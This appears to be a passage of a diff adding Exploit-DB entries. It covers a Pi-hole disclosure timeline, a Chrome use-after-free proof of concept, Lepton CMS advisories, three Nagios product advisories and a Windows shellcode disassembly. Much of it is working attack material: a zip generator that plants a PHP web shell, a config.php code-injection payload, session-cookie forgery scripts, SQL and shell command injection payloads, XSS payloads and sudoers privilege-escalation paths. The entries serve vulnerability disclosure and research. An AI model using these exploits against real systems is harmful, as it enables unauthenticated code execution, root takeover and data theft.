+# http://pi-hole-server/admin/list.php?l=white
+# or
+# http://pi-hole-server/admin/list.php?l=black
+#
+# And a pop-up will appear.
+
+# Disclosure timeline:
+# July 20th 2016: Sent initial email to author.
+# July 21st 2016: Response, bug has been forwarded to web dev people
+# July 22nd 2016: Asked to be kept up to date on fix
+# July 27th 2016: Author replied saying he shall
+# July 28th 2016: - Today I had chocolat milk -
+# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm
+# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120
+# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well.
+# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC. -
+# August 10th 2016: Still nothing
+# August 12th 2016: Submitting this is taking too much time to integrate their fix
+
+-- 
+Notice: This email does not mean I'm consenting to receiving promotional 
+emails/spam/etc. Remember Canada has laws.

platforms/osx/dos/40243.html

@@ -0,0 +1,104 @@
+#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+<html>
+	<head>
+		<script>
+			function sprayOne(mem, size, v) {
+                                var a = new Uint8ClampedArray(size - 20);
+                                for (var j = 0; j < a.length; j++) a[j] = v;
+				var t = document.createTextNode(String.fromCharCode.apply(null, new Uint16Array(a)));
+                             	mem.push(t);
+			}
+			function dsm(evnt) {
+				// spray
+				var mem = [];
+				for (var j = 20; j < 8192; j++) sprayOne(mem, j, 0x43);
+				
+/*
+
+Chromium release build 28.0.1461.0 (191833), built with options:
+
+GYP_GENERATORS=ninja GYP_DEFINES='component=shared_library mac_strip_release=0' gclient runhooks
+
+lldb attached to Chromium in --single-process mode:
+
+* thread #28: tid = 0x3803, 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155, stop reason = EXC_BAD_ACCESS (code=1, address=0x43434617)
+    frame #0: 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155
+   152 	    virtual IntRect borderBoundingBox() const { return pixelSnappedBorderBoxRect(); } 
+   153 	
+   154 	    // The content area of the box (excludes padding - and intrinsic padding for table cells, etc... - and border).
+-> 155 	    LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }
+   156 	    // The content box in absolute coords. Ignores transforms.
+   157 	    IntRect absoluteContentBox() const;
+   158 	    // The content box converted to absolute coords (taking transforms into account).
+
+(lldb) reg read
+General Purpose Registers:
+       eax = 0x43434343
+       ebx = 0x12ae436c
+       ecx = 0x00000018
+       edx = 0x0edab374
+       edi = 0x0edd6858
+       esi = 0x12ae436c
+       ebp = 0xb9bf8e38
+       esp = 0xb9bf8d50
+        ss = 0x00000023
+    eflags = 0x00010286
+       eip = 0x07b617e4  libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
+  libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172
+        cs = 0x0000001b
+        ds = 0x00000023
+        es = 0x00000023
+        fs = 0x00000023
+        gs = 0x0000000f
+
+(lldb) disass
+libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
+libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172:
+-> 0x7b617e4:  calll  *724(%eax)
+   0x7b617ea:  movl   %eax, -180(%ebp)
+   0x7b617f0:  movl   (%ebx), %eax
+   0x7b617f2:  movl   %ebx, (%esp)
+
+*/
+			}
+		</script>
+	</head>
+	<body>
+		<iframe src="object-beforeload-frame-chrome.html"></iframe>
+	</body>
+</html>
+#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+
+
+
+
+#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+<html>
+	<head>
+		<script>
+			var nb = 0;
+			function handleBeforeLoad() {
+				if (++nb == 1) {
+					p.addEventListener('DOMSubtreeModified', parent.dsm, false);
+				} else if (nb == 2) {
+					p.removeChild(f);
+				}
+			}
+			
+			function documentLoaded() {
+				f = window.frameElement;
+				p = f.parentNode;
+				var o = document.createElement("object");
+				o.addEventListener('beforeload', handleBeforeLoad, false);
+				document.body.appendChild(o);
+			}
+
+			window.onload = documentLoaded;
+		</script>
+	</head>
+	<body></body>
+</html>
+#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
+
+## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696

platforms/php/webapps/40247.txt

@@ -0,0 +1,98 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
+
+[+] ISR: ApparitionSec
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System (CMS).
+
+
+Vulnerability Type:
+============================
+Archive Directory Traversal 
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
+will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
+the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
+then be used to execute remote commands on the affected host system. 
+
+e.g.
+
+We get error message as below.
+
+under "Add Ons" tab Install Module.
+Invalid LEPTON installation file. Please check the *.zip format.[1]
+
+Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
+
+
+Exploit code(s):
+===============
+
+<?php
+#Archive Directory Traversal to RCE exploit 
+#==============================================
+
+if($argc<2){echo "Usage: <filename>";exit();}
+$file_name=$argv[1];
+
+$zip = new ZipArchive();
+$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
+$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>');
+$zip->close();
+
+echo "Malicious archive created...\r\n";
+echo "========= hyp3rlinx ============";
+?>
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016  : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX

platforms/php/webapps/40248.txt

@@ -0,0 +1,141 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System
+(CMS).
+
+
+
+
+Vulnerability Type:
+===================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+No input validation check is done on the "Database User" input field when
+entering Lepton CMS setup information using the Install Wizard.
+Therefore, a malicious user can input whatever they want in "config.php",
+this can allow for PHP Remote Command Execution on the Host system.
+
+e.g.
+
+In the database username field, single quote to close "DB_USERNAME" value
+then open our own PHP tags.
+
+');?><?php exec(`calc.exe`);?>
+
+Now in "config.php" the Database username becomes ===>
+define('DB_USERNAME', '');?><?php exec(`calc.exe`);?>');
+
+A security check attempt is made by Lepton to disallow making multiple HTTP
+requests for "config.php". On line 3 of "config.php" file we find.
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////
+
+if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted
+to load \'config.php\' twice!!
+Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+However, the security check is placed on line 3 way before "LEPTON_PATH"
+has been defined allowing complete bypass of that access control check.
+Now we can inject our own PHP code into the config allowing Remote Command
+Execution or Local/Remote File Includes etc...
+
+Next, make HTTP GET request to "http://victim-server/upload/install/save.php"
+again and code execution will be achieved or request "config.php"
+directly as the security check made on line 3 of "config.php" to prevent
+multiple HTTP requests to "config.php" does NOT work anyhow.
+
+In situations where an installation script is provided as part of a some
+default image often available as a convenience by hosting providers, this
+can
+be used to gain code execution on the target system and bypass whatever
+security access controls/restrictions etc.
+
+References:
+http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
+
+
+Exploit code(s):
+===============
+
+1) At step 4 of Leptons Install Wizard, enter ');?><?php
+exec(`calc.exe`);?> for Database User name, then fill in rest of fields
+
+2) Click go to step 5 and fill in required fields, then click "Install
+LEPTON"
+
+3) Make HTTP GET request to:
+
+ http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
+
+  OR
+
+ http://localhost/LEPTON_stable_2.2.0/upload/config.php
+
+
+BOOM pop calc.exe...
+
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016  : Public Disclosure
+
+
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX

platforms/php/webapps/40250.txt

@@ -0,0 +1,170 @@
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+
+Nagios Log Server Multiple Vulnerabilities
+Affected versions: Nagios Log Server <= 1.4.1
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Log Server application is affected by multiple security
+vulnerabilities, including authentication bypass, stored cross-site
+scripting, inconsistent authorization controls and privilege escalation.
+
+These vulnerabilities can be chained together to obtain unauthenticated
+remote code execution in the context of the root user.
+
+
++------------+
+|Exploitation|
++------------+
+==Authentication Bypass==
+Authentication for the Nagios Log Server web management interface can be
+bypassed due to an insecure implementation of the function validating
+session cookies within the ‘Session.php’ file. As shown below, the
+application uses a base64 encoded serialized PHP string along with a
+SHA1 HMAC checksum as the cookie to authenticate and manage user
+sessions. A sample cookie format is shown below:
+
+a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123";
+s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
+Gecko/20100101 Firefox/46.0";
+s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user";
+s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}<SHA1-HMAC-CHECKSUM>
+
+The application relies on the validation against the SHA1 HMAC to
+recognize and destroy invalid session cookies when the checksum value
+does not match. However the encryption key used to generate the HMAC
+checksum is statically set to the SHA1 hash value of the
+$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
+This information can be controlled by the attacker and as such should
+not be considered a secure randomly generated value for the secret
+encryption key.
+
+Since no further verification is performed for other non-predictable
+fields (e.g. session_id, apikey, email, username etc.) and only a valid
+user agent string matching the correct HTTP header value is required, an
+attacker can forge arbitrary session cookies and bypass authentication.
+
+The script on the following page generates session cookies which are
+accepted and validated successfully by the application. A ‘user_id’
+value of 1 can be used to initiate a session in the context of the admin
+user.
+
+[POC - nagiosls_forge_cookie.php]
+<?php
+
+// Usage: php nagiosls_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME]
+
+$host = $argv[1];
+
+<?php
+
+$host = $argv[1];
+
+$session =
+'a:11:{s:10:"session_id";s:32:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:10:"ip_address";s:15:"123.123.123.123";
+s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
+Gecko/20100101 Firefox/46.0";s:13:"last_activity";
+i:1463693772;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"XXXX";s:5:"email";s:16:"test@example.com";
+s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}';
+
+$encryption_key = sha1($host);
+
+$hmac_check = hash_hmac('sha1', $session, $encryption_key);
+
+$cookie = $session . $hmac_check;
+echo urlencode($cookie);
+
+?>
+
+
+This vulnerability is present across multiple Nagios products.
+
+
+==Stored Cross-Site Scripting==
+The Nagios Log Server application does not validate and HTML encode log
+data sent by configured sources. This issue is aggravated by the fact
+that the application does not maintain a list of authorized log sources,
+but instead accept data from any host connecting to the Nagios Log
+Server port responsible of collecting logs (TCP 5544). An attacker can
+exploit this vulnerability to send malicious JavaScript code and execute
+it in the context of Nagios Log Server user session as shown below.
+
+[POC STORED XSS]
+# echo '<script>alert("xss")</script>' | nc [TARGET IP] 5544
+
+The payload gets rendered under '/nagioslogserver/dashboard'.
+
+==Inconsistent Authorization Controls==
+The Nagios Log Server application provides intended functionality to
+define custom alert commands using different configuration options. By
+default, only administrative users can define alert commands which
+execute scripts on the Log Server filesystem when an alert is triggered.
+
+However, the application does not properly enforce authorization checks
+and an attacker can access the same functionality in the context of a
+standard user session by providing the correct payload in the ‘alert’
+POST parameter. This functionality can be abused to obtain remote code
+execution on the target system as the application does not restrict the
+script definition to a single folder and an attacker can specify
+absolute paths to any script or executable file present on the Log
+Server host.
+
+[POC - CREATE COMMAND EXECUTION ALERT]
+URL => /nagioslogserver/api/check/create/1
+Method => POST
+Payload =>
+alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1",
+"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch",
+"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"}
+
+
+==Privilege Escalation==
+The default Log Server application sudoers configuration allows the
+‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without
+being prompted for a password. However insecure file write permissions
+have been granted to the 'nagios' group for the ‘get_logstash_ports.sh’
+script file. Since the apache user is a member of the 'nagios' group, an
+attacker can overwrite the script contents with arbitrary data.
+
+Details about the script with insecure permissions are provided below:
+PATH => /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
+PERMISSIONS => rwxrwxr-x nagios nagios
+
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Log Server 1.4.2
+
+
++------------+
+|  Timeline  |
++------------+
+2/06/2016 – Initial disclosure to vendor
+3/06/2016 – Vendor acknowledges receipt of advisory
+22/07/2016 – Vendor releases patched software version
+11/08/2016 – Public disclosure
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf

platforms/php/webapps/40251.txt

@@ -0,0 +1,191 @@
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+
+Nagios Network Analyzer Multiple Vulnerabilities
+Affected versions: Nagios Network Analyzer <= 2.2.0
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Network Analyzer application is affected by multiple security
+vulnerabilities, including authentication bypass, SQL injection,
+arbitrary code execution via command injection and privilege escalation.
+
+These vulnerabilities can be chained together to obtain unauthenticated
+remote code execution in the context of the root user.
+
++------------+
+|Exploitation|
++------------+
+==Authentication Bypass==
+Authentication for the Nagios Network Analyzer web management interface
+can be bypassed due to an insecure implementation of the function
+validating session cookies within the ‘Session.php’ file. As shown
+below, the application uses a base64 encoded serialized PHP string along
+with a SHA1 HMAC checksum as the cookie to authenticate and manage user
+sessions. A sample cookie format is shown below:
+
+ a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx";
+ s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
+Gecko/20100101 Firefox/46.0";s:13:"last_activity";
+ i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email";
+ s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";
+ s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession";
+ b:1;s:7:"view_id";i:0;}<SHA1_HMAC_CHECKSUM>
+
+The application relies on the validation against the SHA1 HMAC to
+recognize and destroy invalid session cookies when the checksum value
+does not match. However the encryption key used to generate the HMAC
+checksum is statically set to the SHA1 hash value of the
+$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
+This information can be controlled by the attacker and as such should
+not be considered a secure randomly generated value for the secret
+encryption key.
+
+Since no further verification is performed for other non-predictable
+fields (e.g. session_id, apikey, email, username etc.) and only a valid
+user agent string matching the correct HTTP header value is required, an
+attacker can forge arbitrary session cookies and bypass authentication.
+
+The script on the following page generates session cookies which are
+accepted and validated successfully by the application. A ‘user_id’
+value of 1 can be used to initiate a session in the context of the admin
+user.
+
+[POC - nagiosna_forge_cookie.php]
+<?php
+
+// Usage: php nagiosna_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME]
+
+$host = $argv[1];
+
+$session =
+'a:14:{s:10:"session_id";s:32:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:10:"ip_address";
+s:15:"123.123.123.123";s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT
+6.3; WOW64; rv:46.0) Gecko/20100101
+Firefox/46.0";s:13:"last_activity";i:1463229493;s:9:"user_data";s:0:"";s:8:"identity";s:4:"XXXX";s:8:"username";
+s:4:"XXXX";s:5:"email";s:16:"test@example.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"XXXXXXXXXX";
+s:9:"apiaccess";s:1:"1";s:6:"apikey";s:40:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:8:"language";s:7:"default";
+s:10:"apisession";b:1;}';
+
+$encryption_key = sha1($host);
+
+$hmac_check = hash_hmac('sha1', $session, $encryption_key);
+
+$cookie = $session . $hmac_check;
+echo urlencode($cookie);
+
+?>
+
+This vulnerability is present across multiple Nagios products.
+
+
+==SQL Injection==
+Multiple SQL injection vulnerabilities exist in the application web
+management interface. An attacker can exploit this vulnerabilities to
+retrieve sensitive data from the application MySQL database.
+
+URL =>
+/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC
+Method => GET
+Parameter => o[col]
+POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
+
+URL =>
+/nagiosna/index.php/api/sources/read?o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC
+Method => GET
+Parameter => o[col]
+POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
+
+URL => /nagiosna/index.php/admin/globals
+Method => POST
+Parameter => timezone
+POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT
+COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS
+CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT
+0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
+GROUP BY x)a) AND '%'=''
+
+
+==Command Injection==
+A command injection vulnerability exists in the function generating PDF
+reports for download. Base64 encoded user-supplied input is passed as an
+argument to system shell calls without being escaped. An attacker can
+inject arbitrary shell commands and obtain remote code execution in the
+context of the apache user.
+
+URL => /nagiosna/index.php/download/report/sourcegroup/<ID>/<BASE64
+ENCODED PAYLOAD>
+Method => GET
+POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
+
+URL => /nagiosna/index.php/download/report/source/<ID>/<BASE64 ENCODED
+PAYLOAD>
+Method => GET
+POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
+
+Arbitrary code execution in the context of the ‘nna’ user can also be
+obtained by abusing the intended functionality to define custom alert
+commands. As shown in the next section, this exposes the application to
+additional privilege escalation attack vectors.
+
+
+==Privilege Escalation==
+The default application sudoers configuration allows the ‘apache’ and
+‘nna’ users to run multiple Bash and Python scripts as root without
+being prompted for a password. The 'apache' user is in the 'nnacmd'
+group, which has insecure write permissions to multiple script files. An
+attacker can overwrite their contents with a malicious payload (i.e.
+spawn a shell) and escalate privileges to root.
+
+The script files with insecure permissions are listed below:
+
+PATH => /usr/local/nagiosna/bin/rc.py
+PERMISSIONS => rwxrwxr-t nna nnacmd
+
+PATH => /usr/local/nagiosna/scripts/change_timezone.sh
+PERMISSIONS => rwsrwsr-t nna nnacmd
+
+PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh
+PERMISSIONS => rwsrwsr-t nna nnacmd
+
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Network Analyzer 2.2.2.
+
+
++------------+
+|  Timeline  |
++------------+
+2/06/2016 – Initial disclosure to vendor
+3/06/2016 – Vendor acknowledges receipt of advisory
+3/06/2016 – Vendor releases new software build (2.2.1)
+8/07/2016 – Inform vendor about insecure fix (generation of encryption
+key based on epoch)
+9/07/2016 – Vendor confirms issue and replies with new fix
+01/08/2016 – Vendor releases patched software version
+11/08/2016 – Public disclosure
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf

platforms/php/webapps/40252.txt

@@ -0,0 +1,124 @@
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+
+Nagios Incident Manager Multiple Vulnerabilities
+Affected versions: Nagios Incident Manager <= 2.0.0
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Incident Manager application is vulnerable to multiple
+vulnerabilities, including remote code execution via command injection,
+SQL injection and stored cross-site scripting.
+
+
++------------+
+|Exploitation|
++------------+
+==Command Injection==
+Multiple command injection vulnerabilities exist within the incident
+report file generation functionality as user input is passed to system
+shell calls without validation. A limited non-administrative user, who
+by default does not have permissions to add custom MIME types for
+incident file attachments, can exploit these vulnerabilities to obtain
+remote code execution on the Incident Manager system as the ‘apache’ user.
+
+URL => /nagiosim/reports/download/<pdf|jpg>/mttr/<BASE64 PAYLOAD>
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download/<pdf|jpg>/closed/<BASE64 PAYLOAD>
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download/<pdf|jpg>/first_response/<BASE64 PAYLOAD>
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download/<pdf|jpg>/general/<BASE64 PAYLOAD>
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+
+==SQL Injection==
+The Nagios IM admin functionality to update the application settings is
+vulnerable to an SQL Injection vulnerability via error-based payloads.
+An attacker can inject into the ‘timezone’ POST parameter and retrieve
+sensitive information from the application MySQL database.
+
+URL => /nagiosim/admin/settings
+Method => POST
+Parameter => timezone
+Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
+COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
+CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
+
+
+==Stored Cross-Site Scripting==
+Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
+web interface, allowing a standard user to insert malicious JavaScript
+payloads into administrative and non-administrative application
+functionality. This attack vector could be used by an authenticated
+attacker with standard user privileges to hijack the session of an admin
+user and extend their permissions within the application (e.g. adding
+PHP as a valid MIME type for file attachments).
+
+URL => /nagiosim/incidents/add
+Method => POST
+Parameters => title, summary, priority, file_description, status
+Render => /nagiosim/incidents, /nagiosim/incidents/details/<ID>
+POC Payload => <script>alert(1)</script>
+
+URL => /nagiosim/api/incidents/<ID>/messages
+Method => POST
+Parameters => title
+Render => /nagiosim/incidents/details/<ID>
+POC Payload => <script>alert(1)</script>
+
+URL => /nagiosim/profile
+Method => POST
+Parameters => username, first_name, last_name
+Render => /nagiosim/admin/users, Global Menu Banner (username)
+POC Payload => <script>alert(1)</script>
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Incident Manager 2.0.1
+
+
++------------+
+|  Timeline  |
++------------+
+2/06/2016 - Initial disclosure to vendor
+3/06/2016 - Vendor acknowledges receipt of advisory
+8/07/2016 - Vendor releases patched software version (2.0.1)
+11/08/2016 – Public disclosure
+
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf

platforms/win_x86/shellcode/40245.c

@@ -0,0 +1,273 @@
+/*
+	# Title : Windows x86 MessageBoxA shellcode
+	# Author : Roziul Hasan Khan Shifat
+	# Date : 14-08-2016
+	# Tested On : Windows 7 starter x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+   0:	31 c9                	xor    %ecx,%ecx
+   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
+   6:	8b 40 0c             	mov    0xc(%eax),%eax
+   9:	8b 70 14             	mov    0x14(%eax),%esi
+   c:	ad                   	lods   %ds:(%esi),%eax
+   d:	96                   	xchg   %eax,%esi
+   e:	ad                   	lods   %ds:(%esi),%eax
+   f:	8b 48 10             	mov    0x10(%eax),%ecx
+  12:	31 db                	xor    %ebx,%ebx
+  14:	8b 59 3c             	mov    0x3c(%ecx),%ebx
+  17:	01 cb                	add    %ecx,%ebx
+  19:	8b 5b 78             	mov    0x78(%ebx),%ebx
+  1c:	01 cb                	add    %ecx,%ebx
+  1e:	8b 73 20             	mov    0x20(%ebx),%esi
+  21:	01 ce                	add    %ecx,%esi
+  23:	31 d2                	xor    %edx,%edx
+
+00000025 <g>:
+  25:	42                   	inc    %edx
+  26:	ad                   	lods   %ds:(%esi),%eax
+  27:	01 c8                	add    %ecx,%eax
+  29:	81 38 47 65 74 50    	cmpl   $0x50746547,(%eax)
+  2f:	75 f4                	jne    25 <g>
+  31:	81 78 04 72 6f 63 41 	cmpl   $0x41636f72,0x4(%eax)
+  38:	75 eb                	jne    25 <g>
+  3a:	81 78 08 64 64 72 65 	cmpl   $0x65726464,0x8(%eax)
+  41:	75 e2                	jne    25 <g>
+  43:	8b 73 1c             	mov    0x1c(%ebx),%esi
+  46:	01 ce                	add    %ecx,%esi
